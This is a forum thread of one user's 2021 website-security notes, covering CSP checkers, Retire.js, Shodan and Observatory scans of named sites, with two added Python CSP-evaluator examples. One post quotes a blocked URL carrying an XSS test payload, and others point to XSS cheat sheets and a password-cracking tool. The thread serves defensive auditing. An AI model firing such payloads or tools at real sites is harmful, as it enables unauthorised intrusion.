default-src 'none'; script-src 'self' https://cdn.polyfill.io https://connect.facebook.net http://www.google-analytics.com https://www.google.com https://www.gstatic.com http://static.ads-twitter.com https://analytics.twitter.com 'nonce-**csp_nonce**' data:; connect-src 'self' *.blockchain.com *.blockchain.info *.cryptocompare.com https://blockchain.info https://api.greenhouse.io https://www.google-analytics.com https://stats.g.doubleclick.net https://script.google.com https://script.googleusercontent.com; frame-src 'self' *.blockchain.com *.blockchain.info https://www.google.com https://www.youtube.com; img-src 'self' *.blockchain.com *.blockchain.info data: *.cryptocompare.com *.googleusercontent.com https://www.facebook.com http://www.google-analytics.com https://www.google.com http://t.co/i/adsct; style-src 'self' 'unsafe-inline' https://rsms.me https://fonts.googleapis.com 'nonce-**csp_nonce**'; font-src 'self' https://rsms.me https://fonts.gstatic.com data:; manifest-src 'self'; object-src 'self';

https://csp-evaluator.withgoogle.com/?csp=https://www.blockchain.com/
https://webcookies.org/cookies/www.blockchain.com/19138296
https://html.spec.whatwg.org/multipage/input.html#valid-e-mail-address

polonus
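Added example (not part of this post or of the October 19 CSP post above, and not CSP Evaluator's code): a small evaluator that reproduces the checks both posts' evaluator output shows, namely 'unsafe-inline' and 'unsafe-eval', scheme-wide sources such as https: and data:, the default-src fallback when script-src is absent (the ad.nl case), plaintext http:// sources, a nonce that is not base64, and hosts known to host JSONP or Angular bypasses. BLOCKCHAIN_CSP is the policy quoted in the headers above; BYPASS_HOSTS is a two-entry list taken from the evaluator output above and is nowhere near the real evaluator's database.

```python
import re

# Hosts the evaluator output above names as CSP bypasses; a short illustrative
# list, not the evaluator's full database.
BYPASS_HOSTS = {
    "www.google.com": "known JSONP endpoints",
    "www.gstatic.com": "known Angular libraries",
}
BROAD_SOURCES = {"*", "https:", "http:", "data:"}
NONCE_RE = re.compile(r"^'nonce-[A-Za-z0-9+/=_-]+'$")   # base64 / base64url charset

# The blockchain.com policy quoted above, used here as input.
BLOCKCHAIN_CSP = (
    "default-src 'none'; script-src 'self' https://cdn.polyfill.io "
    "https://connect.facebook.net http://www.google-analytics.com https://www.google.com "
    "https://www.gstatic.com http://static.ads-twitter.com https://analytics.twitter.com "
    "'nonce-**csp_nonce**' data:; connect-src 'self' *.blockchain.com *.blockchain.info "
    "*.cryptocompare.com https://blockchain.info https://api.greenhouse.io "
    "https://www.google-analytics.com https://stats.g.doubleclick.net https://script.google.com "
    "https://script.googleusercontent.com; frame-src 'self' *.blockchain.com *.blockchain.info "
    "https://www.google.com https://www.youtube.com; img-src 'self' *.blockchain.com "
    "*.blockchain.info data: *.cryptocompare.com *.googleusercontent.com https://www.facebook.com "
    "http://www.google-analytics.com https://www.google.com http://t.co/i/adsct; "
    "style-src 'self' 'unsafe-inline' https://rsms.me https://fonts.googleapis.com "
    "'nonce-**csp_nonce**'; font-src 'self' https://rsms.me https://fonts.gstatic.com data:; "
    "manifest-src 'self'; object-src 'self';"
)


def parse_csp(policy: str) -> dict:
    """'dir a b; dir2 c' -> {'dir': ['a', 'b'], 'dir2': ['c']}.
    Per the spec a repeated directive is ignored, so the first occurrence wins."""
    csp = {}
    for part in policy.split(";"):
        tokens = part.split()
        if tokens:
            csp.setdefault(tokens[0].lower(), tokens[1:])
    return csp


def evaluate_csp(policy: str) -> list:
    """Return (directive, source, problem) triples in the spirit of CSP Evaluator."""
    csp = parse_csp(policy)
    findings = []
    # Browsers fall back to default-src when script-src is absent, so the
    # weaknesses of default-src become script weaknesses.
    label = "script-src" if "script-src" in csp else "default-src"
    for src in csp.get(label, []):
        s = src.lower()
        if s == "'unsafe-inline'":
            # CSP3 browsers ignore it once a nonce/hash is present, but older
            # ones do not, so it is still reported.
            findings.append((label, src, "allows in-page scripts and event handlers"))
        elif s == "'unsafe-eval'":
            findings.append((label, src, "allows code injected into eval() and friends"))
        elif s in BROAD_SOURCES:
            findings.append((label, src, "scheme-wide source lets any script of that scheme run"))
        elif s.startswith("'nonce-") and not NONCE_RE.match(src):
            findings.append((label, src, "nonce is not base64; a fixed placeholder protects nothing"))
        host = re.sub(r"^https?://", "", s).split("/")[0]
        if host in BYPASS_HOSTS:
            findings.append((label, src, f"{BYPASS_HOSTS[host]} on this host bypass the policy"))
    if "object-src" not in csp and "default-src" not in csp:
        findings.append(("object-src", "(missing)", "plugins can be loaded from anywhere"))
    for directive, sources in csp.items():
        for src in sources:
            if src.lower().startswith("http://"):
                findings.append((directive, src, "plaintext source; allow only HTTPS"))
    return findings


def plaintext_sources(findings: list) -> list:
    return [(d, s) for d, s, why in findings if why.startswith("plaintext")]


if __name__ == "__main__":
    for directive, src, why in evaluate_csp(BLOCKCHAIN_CSP):
        print(f"{directive:12} {src:40} {why}")
```

The nonce finding is the one to act on first: a literal 'nonce-**csp_nonce**' in the served header means a template placeholder was never substituted, so every page carries the same "nonce" and an attacker who can inject markup simply copies it.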
Title: Re: Tests and other Media topics
Post by: polonus on February 24, 2021, 01:38:13 PM
Better results come as we combine resources.
Example - https://www.ipqualityscore.com/domain-reputation/grynkewich.com
with https://www.ipqualityscore.com/free-ip-lookup-proxy-vpn-test/lookup/68.178.213.37
and https://www.virustotal.com/gui/ip-address/68.178.213.37/relations
and https://www.abuseipdb.com/check/68.178.213.37
and https://dnslytics.com/ip/68.178.213.37
See: https://sitereport.netcraft.com/?url=https://Grynkewich.com
-> https://www.virustotal.com/#/ip-address/34.102.136.180 -> https://www.virustotal.com/gui/ip-address/34.102.136.180/detection
A Tor-address used by hackers: https://ip-46.com/34.102.136.180
Reported 127 times: https://www.abuseipdb.com/check/34.102.136.180?page=2
& https://ip-46.com/68.178.213.37 
More resources: www.liveipmap.com; www.spamrats.com ; findipv6.com ; cleantalk.org ; www.ipligence.com ;
https://www.islegitsite.com/check/ ; https://urlfiltering.paloaltonetworks.com/query/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 01, 2021, 03:03:23 PM
Test for EMOTET: Check here: https://www.haveibeenemotet.com/

Fake sender and recipient means both the mail result and the address were spoofed,
and the mail was sent through an anonymailer or deadfake email service.

There is no legit reason to do so or to use such services
to send mails in the name of another user; it is just pure evil,
and there is no excuse for it other than being banned right away.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 02, 2021, 06:21:54 AM
Another combination of resources, based on a common CloudFlare IP.

https://www.ipqualityscore.com/domain-reputation/circlecloud.net  vs https://ns.tools/circlecloud.net
https://www.ipqualityscore.com/domain-reputation/truckers.com
https://ns.tools/registeredsite.com
https://www.lookip.net/ip/172.65.252.97
https://www.shodan.io/host/172.65.252.97

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 06, 2021, 11:52:56 PM
Seen in the light of recent existing and persistent CSS-Exchange Server vulnerabilities:

https://www.zdnet.com/article/check-to-see-if-youre-vulnerable-to-microsoft-exchange-server-zero-days-using-this-tool/

and https://github.com/microsoft/CSS-Exchange/tree/main/Security

For the latest download: https://github.com/microsoft/CSS-Exchange/releases/latest/download/Test-ProxyLogon.ps1

Stay safe and secure online as well as offline,

polonus


Title: Re: Tests and other Media topics
Post by: polonus on March 07, 2021, 03:10:56 PM
Checking on a blocked script with jQuery/jquery/1.9.1 min.js in the browser.

See: https://dnsviz.net/d/ajax.aspnetcdn.com/dnssec/  (errors and alerts).

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 11, 2021, 11:42:01 AM
In the same realm, going over some results from the workings of my DNS Query Sniffer by Nir Sofer.

Looking up some Microsoft Telemetry addresses (Watson) -> https://domain.opendns.com/watson.microsoft.com
and https://domain.opendns.com/blobcollector.events.data.trafficmanager.net

and then see: https://dnsviz.net/d/skypedataprdcolwus15.cloudapp.net/analyze/

What errors and alerts do we find?
Quote
Notices
Errors (1)
-cloudapp.net zone: The server(s) were not responsive to queries over UDP. (2620:1ec:8ec::201)
Warnings (2)
net to- cloudapp.net: The following NS name(s) were found in the authoritative NS RRset, but not in the delegation NS RRset (i.e., in the net zone): -ns2prod.18.azuredns-prd.org, -ns1prod.18.azuredns-prd.org, -ns2prod.18.azuredns-prd.info, -ns1prod.18.azuredns-prd.info
net to cloudapp.net: The glue address(es) for -ns2-201.azure-dns.net (2620:1ec:8ec::201) differed from its authoritative address(es) (2620:1ec:8ec::c9).
The original data Nir Sofer's DNS Query Sniffer produced on my device.

Host Name   Port Number   Query ID   Request Type   Request Time   Response Time   Duration   Response Code   Records Count   A   CNAME   AAAA   NS   MX   SOA   PTR   SRV   TEXT   Source Address   Destination Address   IP Country   
watson.telemetry.microsoft.com   56300   509F   A   11-3-2021 11:06:52.616   11-3-2021 11:06:52.616   0 ms   Ok   3   -104.43.193.48   -blobcollector.events.data.trafficmanager.net  -skypedataprdcolcus15.cloudapp.net                        -192.168.X.XX   -194.134.216.70      

Know that Cloudflare has zero trust in the security of their own networks. 150,000 security cameras being compromised through a hard-coded password - so you have to be ever vigilant.

In this world you cannot trust a thing coming from the other side of your screens.

Where it went wrong and one of the domains above was involved passively:
https://www.hybrid-analysis.com/sample/f1b9d5520ba13179e19b336e542d18b0bd9f39a2b41d88a739625c8480422b73/6026cc94aa700773e73ca19c

Stay safe and secure both online and offline, is the wish of,

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on March 16, 2021, 10:58:14 PM
Next to extensions such as BuiltWith, Vulners Web Scanner and Zenmate Web Firewall (extension now discontinued),
it is also worth scanning a website online here: https://awesometechstack.com/

See the Tech Stack analysis of this malicious website: https://awesometechstack.com/analysis/website/fullzinfo.pw/
and improvement suggestions:
High
 jQuery v2.0.3   Version   Update jQuery to version 3.6.0
High
 jQuery UI v1.10.2   Security   jQuery UI@1.10.2 has 1 vulnerabilities
Medium
 jQuery v2.0.3   Security   jQuery@2.0.3 has 4 vulnerabilities
Low
 jQuery UI v1.10.2   Version   Update jQuery UI to version 1.12.1

Then compare here, where 2 retirable jquery libraries were detected:
https://retire.insecurity.today/#!/scan/c3e7742206ad74bd068554b9fb4effeb4e2c324998ee0ad2932e543318f2da81

Website abuse: it is into spam: https://www.virustotal.com/gui/url/fbebebf73fe18453840ed74394506ac439d8bc14ec2d048856fac1842f1677dc/detection

DOM-XSS issues: Results from scanning URL: hxtp://Fullzinfo.pw/assets/plugins/blockUI/jquery.blockUI.js
Number of sources found: 29
Number of sinks found: 8
&
Results from scanning URL: hxtp://Fullzinfo.pw/assets/js/ui-elements.js
Number of sources found: 117
Number of sinks found: 42

And coming round a full circle with this scan, bringing up 205 improvement hints (recommendations):
https://webhint.io/scanner/32cc2961-011f-49ff-860a-c78ab12eeeed

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on March 20, 2021, 02:30:50 PM
Online website scanners, they come and go.

Scan here to get quite a number of improvement recommendations, with: https://webhint.io/scanner
For Stack technology use: https://hexometer.com/stack-checker/
A general scanner you can find here: https://securityscan.getastra.com/security-audit?site
A more or less similar scan: https://awesometechstack.com/products/website-analyzer/

But you also can use specific purpose scanners like CSP scanners, made by Google, VirusTotal.
Also search resources like URLHaus etc., through snort- & SNYK scanners,
jQuery library scanners (retire insecurity),
and DOM-XSS issue (sources & sinks) scanners.

Internet.nl: https://internet.nl
The Greenweb Foundation https://www.thegreenwebfoundation.org/
SecurityHeaders: http://securityheaders.com
Mozilla Observatory: https://observatory.mozilla.org
Guardian360 QuickScan https://quickscan.guardian360.nl
More into deep scanning, use Zap: https://www.zaproxy.org.

Through tools, using among others OpenVAS, but also through NMAP linked to a vulnerability database.

Read: https://securitytrails.com/blog/nmap-vulnerability-scan

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on March 29, 2021, 01:29:37 AM
Interesting test site: https://csreis.github.io/tests/cross-site-iframe.html
Code:
VM4 sandbox_bundle.js:15 (electron) Security Warning: webFrame.executeJavaScript was called without worldSafeExecuteJavaScript enabled. This is considered unsafe. worldSafeExecuteJavaScript will be
A browser test for https://build.chromium.org's LUCI Build

Fails at Refused to display 'htxps://accounts.google.com/ServiceLogin?service=ah&passive=true&continue=h…google.com/_ah/conflogin%3Fcontinue%3Dhtxps://chromium-status.appspot.com/' in a frame because it set 'X-Frame-Options' to 'deny'.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 03, 2021, 12:26:56 PM
Any known vulnerabilities - quick scan:
https://www.safetydetectives.com/vulnerability-tool/

0 issues found: SERVER DETAILS
Web Server:
cloudflare
IP Address:
104.26.13.84
Hosting Provider:
CLOUDFLARENET
Shared Hosting:
280 sites found (use Reverse IP to download list)
Site made in WordPress

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 04, 2021, 05:38:20 PM
Happy Easter days to all of you who are reading here now.

The Easter Bunny (Paashaas in Dutch) was intelli-skimming over the website security
of "www dot de wegwyzer dot nl".
It was not as bad as we thought it could be: at the front-end no issues,
but the back-end was another can of worms. :o

Main issue alerted by my DEVCON extension was: No Content Security Policy configured for this site.

At a first glance, I found -c0.wp.com, -i0.wp.com, -i1.wp.com and -i2.wp.com
-log7.js and -count7.pl from -CloudFlare.net and -c.statcounter.com/t.php XHR in appl/json.
All available through scan results (a special php dictionary is used in the scanner to reveal this)

Could go over it with -semgrep.dev/s/we30 (online resource)

No retirable libraries: https://retire.insecurity.today/#!/scan/80c30f378317b2e6b7493461a4f674b86929efa1fd5609aa80cd164c34569fc3

But quite some issues at the back-end: https://www.shodan.io/host/84.244.181.151
Excessive server info proliferation there, Apache httpdVersion: 2 / HTTP/1.1 301 Moved Permanently

No direct issues flagged here: https://sitecheck.sucuri.net/results/www.dewegwyzer.nl
Nor here: at a WordPress security scan.

Some hints towards improvement:
https://webhint.io/scanner/c59d294a-27b6-4131-acde-229e9a779c33#category-security

F-grade here: https://observatory.mozilla.org/analyze/www.dewegwyzer.nl
Also: https://observatory.mozilla.org/analyze/www.dewegwyzer.nl#third-party

Then console info (Ctrl+Shift+I) from my browser (and developer extensions).

This is blocked for me inside my ungoogled chrome:
Quote
Failed to load resource: net::ERR_BLOCKED_BY_CLIENT
-app.wts2.one/log7.js:1 Failed to load resource: net::ERR_BLOCKED_BY_CLIENT
Failed to load resource: net::ERR_BLOCKED_BY_CLIENT
onLoadModule.js:72 ...Selector Finder is running...
/favicon.ico:1 Failed to load resource: the server responded with a status of 404 (Not Found)
Selector Finder is running Failed to load resource: net::ERR_BLOCKED_BY_CLIENT
app.wts2.one/log7.js:1 Failed to load resource: net::ERR_BLOCKED_BY_CLIENT
d3uvwl4wtkgzo1.cloudfront.net/e8af8301-45e2-41c6-9212-9421ce1b1dc7.js:1
Failed to load resource: net::ERR_BLOCKED_BY_CLIENT
onLoadModule.js:72 ...Selector Finder is running...
/favicon.ico:1 Failed to load resource: the server responded with a status of 404 (Not Found)
-content-script.js.mapped for me with Selector Finder in the dev. console.

Also consider info from this scan: https://urlscan.io/result/439d58a9-16c1-4867-a99f-4f55f6992ed5/

polonus (volunteer 3rd party cold recon website security-analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on April 04, 2021, 11:32:57 PM
But there is more on this website's security, that may interest us.

NSA snooping secure? No. Who knows you are on this website?
 -app.wts2.one & -www.dewegwyzer.nl will know,
but with no secure tracker transmission that is.

Detected 1 link and/or script to 3rd parties with no integrity check being performed.

Javascript error: -https://www.statcounter.com/counter/counter.js   
File was not found, because err-blocked-by-client.

HTML
-www.dewegwyzer.nl/
5,978 bytes, 80 nodes

Javascript 8   (external 3, inline 5)
INLINE: (function() { // If GPC on, set DOM property to true if not
964 bytes (DOM-XSS issue?).

INLINE: !function(){let e=!1;function n(){if(!e){const n=document.createElement("meta");
613 bytes

INLINE: /* * This entire block is wrapped in an IIFE to prevent polluting the scope of
445,247 bytes

INLINE: var sc_project=12462450; var sc_invisible=1; var sc_security="c8e29d42"; var
94 bytes

-www.statcounter.com/counter/​counter.js
-app.wts2.one/​log7.js
-d3uvwl4wtkgzo1.cloudfront.net/​e8af8301-45e2-41c6-9212-9421ce1b1dc7.js
INLINE: var wts=document.createElement('script');wts.async=true; wts.src='-https://app.wt
176 bytes

CSS 1   (external 0, inline 1)
INLINE: a { text-decoration: none; }

Retire.js Did not recognize -https://app.wts2.one/count7.pl?2055386&3&&&&&%3CB%3EDE%20WEGWYZER%3C%2FB%3E&http%3A%2F%2Fwww.dewegwyzer.nl&&&741x604&_&0&&0&&0&0&&no&&&7.21&0.19675618019939423

-   -   Did not recognize -https://app.wts2.one/log7.js
31 bytes INJECTED LocalCDN(o) extension was enabled in the browser for me  ;)

CSP No Content Security Policy found - not verified by DNSSEC.

header -> secure setting only for access-control-allow=origin header.

Apache 2 headers not found vulnerable.  Zen Mate FW finds 100% content, nothing blocked.

So yes, it takes some time to evaluate, when one goes error-hunting,

polonus (volunteer 3rd party cold reconnaissance website security-analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on April 05, 2021, 12:57:36 PM
We have lost another fine online resource over the Easter week-end:
-https://domxssscanner.geeksta.net/

The service has been taken down and was archived by the developer.
See: https://wiki.mozilla.org/Security/B2G/JavaScript_code_analysis#DOM_XSS_Scanner

Now I use DOM based XSS finder extension for Chrome.

Could be great if this could be brought online: https://github.com/ajinabraham/Static-DOM-XSS-Scanner

polonus (volunteer 3rd party cold recon website security-analyst and website error-hunter)

Title: Re: Tests and other Media topics
Post by: polonus on April 05, 2021, 02:45:20 PM
But there is an alternative for white hat pentesters and error-hunters like me.
You have to register so these services won't be abused:

https://securityforeveryone.com/tools/all?

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 07, 2021, 11:52:27 PM
Comparing the workings of Retire.js extension and DEVCOM Javascript Security extension.

For the same site:
Quote
Retire.js
jquery   1.7.2   Found in -https://www.security.nl/js/jquery/jquery.securitynl.js?1375741299<br>Vulnerability info:
Medium   CVE-2012-6708 11290 Selector interpreted as HTML   
Medium   2432 3rd party CORS request may execute CVE-2015-9251   
Medium   CVE-2019-11358 jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution   
Medium   CVE-2020-11022 Regex in its jQuery.htmlPrefilter sometimes may introduce XSS   
Medium   CVE-2020-11023 Regex in its jQuery.htmlPrefilter sometimes may introduce XSS   

and  DEVCON's info
Quote
1   Outdated JavaScript Library
Outdated JavaScript libraries detected. jquery 1.7.2
medium : Selector interpreted as HTML
CVE-2012-6708
medium : 3rd party CORS request may execute
CVE-2015-9251
medium : jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution
CVE-2019-11358
medium : Regex in its jQuery.htmlPrefilter sometimes may introduce XSS
CVE-2020-11022
medium : Regex in its jQuery.htmlPrefilter sometimes may introduce XSS
CVE-2020-11023

reported by retire.js
1   missing-content-security-policy
No Content Security Policy configured for this site.

DEVCOM has added CSP information.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 18, 2021, 02:19:57 PM
For developers: https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html

I check in the developer console with my enhanced Tampermonkey script Malware Script Detector enhanced,
based on a former extension for the Firefox browser, now no longer available.
Example
Quote
VM181:76 Syntax error @ "Malware Script Detector v 1.1 Enhanced"!
##########################
JSHINT output:
##########################

SyntaxError: Unexpected identifier
    at eval (<anonymous>)
    at <anonymous>:4:80
    at Object.t [as F_c] (<anonymous>:3:191)
    at Object.E_u (<anonymous>:4:244)
    at eval (eval at exec_fn (:2:115), <anonymous>:74:477)
    at Object.create (eval at exec_fn (:2:115), <anonymous>:76:193)
    at c (eval at exec_fn (:2:115), <anonymous>:15:231)
    at <anonymous>:4:80
    at i (eval at exec_fn (:2:115), <anonymous>:13:165)
    at eval (eval at exec_fn (:2:115), <anonymous>:13:292)

See: https://owasp.org/www-community/attacks/DOM_Based_XSS

Checking also using THC Hydra local security. (3rd party cold recon testing) - using malzilla original browser.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 24, 2021, 01:12:58 PM
22 alternative search engines: https://kinsta.com/blog/alternative-search-engines/

On deep searching: https://www.searchlore.org/

F.R.A.V.I.A.'s legacy online: https://www.aronetics.com/searchlores/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 27, 2021, 03:57:39 PM
Testing against blocking by Netcraft extension & Site report alerts:
https://gbhackers.com/top-500-important-xss-cheat-sheet/  (also using kitploit tampermonkey detection script).
Also consider and see the naughty list: https://gist.github.com/richardevcom/c81c59f693b5c3c5de0445bdd2a73c47
Example, so see:
https://xss.cx/2011/10/22/ghdb/xss-http-header-location-response-splitting-javascript-injection-example-poc-report-01.html

Example: Netcraft Logo
Suspected XSS Attack

This page has been blocked by the Netcraft Extension.

Blocked URL: hxxp://bla-di-bla-news dot net/%3C!%20foo=%22%3E%3Cscript%3Ejavascript:alert(1)%3C/script%3E%22%3E

Kicking up a Rails exception, app vulnerable? Well, at least it indicates a dangerous or potentially negative action.

In most cases we will get a scan fail situation, or we get somewhat the wiser here:

jquery   3.2.1   Found in https://qmod.quotemedia.com/static/v1.3.0/dayyearrange,detailedquotetab,quotehead.js _____Vulnerability info:
Medium   CVE-2019-11358 jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution   123
Medium   CVE-2020-11022 Regex in its jQuery.htmlPrefilter sometimes may introduce XSS   1
Medium   CVE-2020-11023 Regex in its jQuery.htmlPrefilter sometimes may introduce XSS
Errors:
Quote
SyntaxError: Unexpected string
  eval ()()
  :4:80()
  Object.t [as F_c] (:3:191)()
  Object.E_u (:4:244)()
  eval (eval at exec_fn (:2:115), :74:477)()
  Object.create (eval at exec_fn (:2:115), :76:193)()
  c (eval at exec_fn (:2:115), :15:231)()
  :4:80()
  i (eval at exec_fn (:2:115), :13:165)()
  eval (eval at exec_fn (:2:115), :13:292)()

SyntaxError: Invalid regular expression flags
  eval ()()
  :4:80()
  Object.t [as F_c] (:3:191)()
  Object.E_u (:4:244)()
  eval (eval at exec_fn (:2:115), :74:477)()
  Object.create (eval at exec_fn (:2:115), :76:193)()
  c (eval at exec_fn (:2:115), :15:231)()
  :4:80()
  i (eval at exec_fn (:2:115), :13:165)()
  eval (eval at exec_fn (:2:115), :13:292)()
Also see: -https://d1io3yog0oux5.cloudfront.net/_5abd5b5da664e1a491be32c4849e7435/vfc/files/theme/js/_js/all.js

Surroundings: https://sitereport.netcraft.com/netblock?q=AMAZO-CF,13.224.0.0,13.227.255.255

But anyhow it seems this host is not vulnerable. No secure cookie attributes found.

However, SSL not supported -> https://sitereport.netcraft.com/?url=https://www.vfc.com

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 30, 2021, 04:47:58 PM
A Content Security Policy offers an additional layer of protection against XSS attacks:
https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP
Check: https://cspvalidator.org/#url=https://cspvalidator.org/
and https://cspscanner.com/

polonus
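To go with the CSP checkers linked in the post above, here is an added example (not code from the forum thread or from any of the linked scanners) of a small offline CSP evaluator: it parses a header value and reports the kind of weak settings the online validators flag, such as data: in script-src, plain-http sources, object-src not set to 'none', and missing base-uri and frame-ancestors. The sample policy is constructed for the demonstration.

```python
"""Static checks on a Content-Security-Policy header value.

Added example, not the forum's or any scanner's own code. It reproduces a few
of the checks a CSP evaluator performs so that a header copied out of a site's
response can be reviewed offline. SAMPLE_CSP is a constructed policy.
"""

# Fetch directives that fall back to default-src when they are absent.
FALLBACK_TO_DEFAULT = {"script-src", "style-src", "img-src", "connect-src",
                       "font-src", "object-src", "frame-src", "media-src"}

# Constructed sample (not a real site's header): shares the shape of the
# policies discussed in this thread, including a nonce next to data:.
SAMPLE_CSP = (
    "default-src 'none'; "
    "script-src 'self' https://cdn.example.net http://analytics.example.org "
    "'nonce-abc123' data:; "
    "style-src 'self' 'unsafe-inline'; img-src 'self' data:; "
    "object-src 'self'; font-src 'self'"
)


def parse_csp(header: str) -> dict:
    """Split a CSP header into {directive: [sources]}.

    Directive names are case-insensitive and, as browsers do, only the first
    occurrence of a directive is honoured; later duplicates are ignored.
    """
    policy = {}
    for part in header.split(";"):
        tokens = part.split()
        if not tokens:
            continue
        name = tokens[0].lower()
        if name not in policy:
            policy[name] = tokens[1:]
    return policy


def effective_sources(policy: dict, directive: str) -> list:
    """Sources governing `directive`, honouring the default-src fallback."""
    if directive in policy:
        return policy[directive]
    if directive in FALLBACK_TO_DEFAULT:
        return policy.get("default-src", [])
    return []


def _has_nonce_or_hash(sources: list) -> bool:
    # With a nonce or hash present, browsers ignore 'unsafe-inline' (CSP2+).
    return any(s.startswith("'nonce-") or s.startswith("'sha") for s in sources)


def evaluate_csp(header: str) -> list:
    """Return (severity, directive, message) findings for the policy."""
    policy = parse_csp(header)
    findings = []

    script = effective_sources(policy, "script-src")
    if "'unsafe-inline'" in script and not _has_nonce_or_hash(script):
        findings.append(("high", "script-src", "'unsafe-inline' allows inline scripts"))
    if "'unsafe-eval'" in script:
        findings.append(("medium", "script-src", "'unsafe-eval' allows eval()"))
    if "data:" in script:
        findings.append(("high", "script-src", "data: URIs can carry attacker-controlled scripts"))
    if any(s in ("*", "http:", "https:") for s in script):
        findings.append(("high", "script-src", "wildcard scheme or host allows scripts from anywhere"))
    for src in script:
        if src.startswith("http://"):
            findings.append(("medium", "script-src", f"plain-http source {src} can be tampered with in transit"))

    if effective_sources(policy, "object-src") != ["'none'"]:
        findings.append(("medium", "object-src", "should be 'none' to stop plugin-based script execution"))
    if "base-uri" not in policy:
        findings.append(("medium", "base-uri", "missing; an injected <base> tag can redirect relative script URLs"))
    if "frame-ancestors" not in policy:
        findings.append(("medium", "frame-ancestors", "missing; no CSP clickjacking protection"))

    style = effective_sources(policy, "style-src")
    if "'unsafe-inline'" in style and not _has_nonce_or_hash(style):
        findings.append(("low", "style-src", "'unsafe-inline' permits CSS injection"))

    if not any(d in policy for d in ("report-uri", "report-to")):
        findings.append(("info", "report-uri", "no violation reporting configured"))
    return findings


if __name__ == "__main__":
    for severity, directive, message in evaluate_csp(SAMPLE_CSP):
        print(f"[{severity:6}] {directive}: {message}")
```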
Title: Re: Tests and other Media topics
Post by: polonus on May 02, 2021, 01:51:49 PM
Interesting resources: http://write.flossmanuals.net/basic-internet-security/introduction/

We have already lost and will lose a lot of fine online resources over time,
because maintainers struggle to pay for server services.

Recent examples: https://geeksta.net/domxssscanner/  is now history.
Almost history and shutting down: https://retire.insecurity.today/

Now we have to work with extensions and developer tools,
but we do not always want to visit particularly suspicious or payload-laden malicious websites, do we, folks?
So I use my own tweaked version of Bobby's sand-boxed malzilla browser (preferably on a stand-alone comp).

Also time to read here: https://riseup.net/en/security/resources
(this in the light of the tails website that is down at the moment)
also: https://www.reddit.com/r/tails/comments/n22ymd/is_tails_website_down/gwhr47k/

When the going gets narrow, keep an eye on the sparrow, the song says,

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on May 02, 2021, 06:53:38 PM
But for a website we have security issues for that particular website ->
https://awesometechstack.com/analysis/website/aeiou.pt/
See also scan results at: https://urlscan.io/result/ef728587-3b9d-40ca-aea2-32a6c4c5f67b/
And we also have to consider the vulnerabilities on the hosting party's nginx-driven webserver:
https://www.shodan.io/host/195.170.168.62 e.g. for -http://ajuda.aeiou.pt/xmlrpc.php
and https://www.shodan.io/host/172.217.164.134 *

We should not have access to for instance "/bla/index_deafaultpage.html" & blog/idem
or xekmail/_index_defaultpage.html or GET "/xmlrpc.php? rsd  on that nginx server with wp-content and wp includes.

We also should check: -http://linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js
See TLS recommendations: https://sitecheck.sucuri.net/results/www.aeiou.pt

See the complete scan info: https://retire.insecurity.today/#!/scan/e1369956b7a8dc3e43e3066331308ee19372ec97b6b79f6f529659d8a199c9e1
See for instance: -https://s0.2mdn.net/ads/studio/Enabler.js * etc.   
Issued by Google Trust Services.. (no vulnerable libraries detected).

Thanks go out to Erlend Oftedal from Norway for his continuous resources on Retire.JS,
and the resources at retire insecurity to-day.
He helped a lot of people here and website admins through his scan results, reported on these forums.
We owe him a lot,

polonus a.k.a. Damian (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on May 02, 2021, 10:02:02 PM
Compare to the F-grade scan results here: https://observatory.mozilla.org/analyze/ajuda.aeiou.pt
This site uses an untrusted or invalid certificate.

The following results ignore this error:
https://observatory.mozilla.org/analyze/ajuda.aeiou.pt#tls

F-grade and x-results: https://observatory.mozilla.org/analyze/ajuda.aeiou.pt#third-party

T-rating: https://www.ssllabs.com/ssltest/analyze?d=ajuda.aeiou.pt

CSP scan results:
Quote
URL
-http://ajuda.aeiou.pt/

No CSP
F
Result
CSP Protection None
CSP Reporting  Missing
CSP Validity     Invalid
XSS                 No CSP Protection
Clickjacking      No CSP Protection
Formjacking      No CSP Protection
General            No CSP Protection
Summary
13 Fatal Errors
16 Warnings
5 Info
0 Valid
Content Security Policy (CSP)

Probably blocked by user: JavaScript error message: File not found:
-http://d3uvwl4wtkgzo1.cloudfront.net/e8af8301-45e2-41c6-9212-9421ce1b1dc7.js

TypeError: Cannot read property 'fn' of undefined
 chrome-extension://lcmaikahgebmdmnckjbaikfllpmgabei/detection/script.js:28 patch()
 chrome-extension://lcmaikahgebmdmnckjbaikfllpmgabei/detection/script.js:64
 chrome-extension://lcmaikahgebmdmnckjbaikfllpmgabei/detection/script.js:65

Otto extension gives 4 issues for weak security:
Quote
jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution
Medium Severity
: CVE-2019-11358
Regex in its jQuery.htmlPrefilter sometimes may introduce XSS
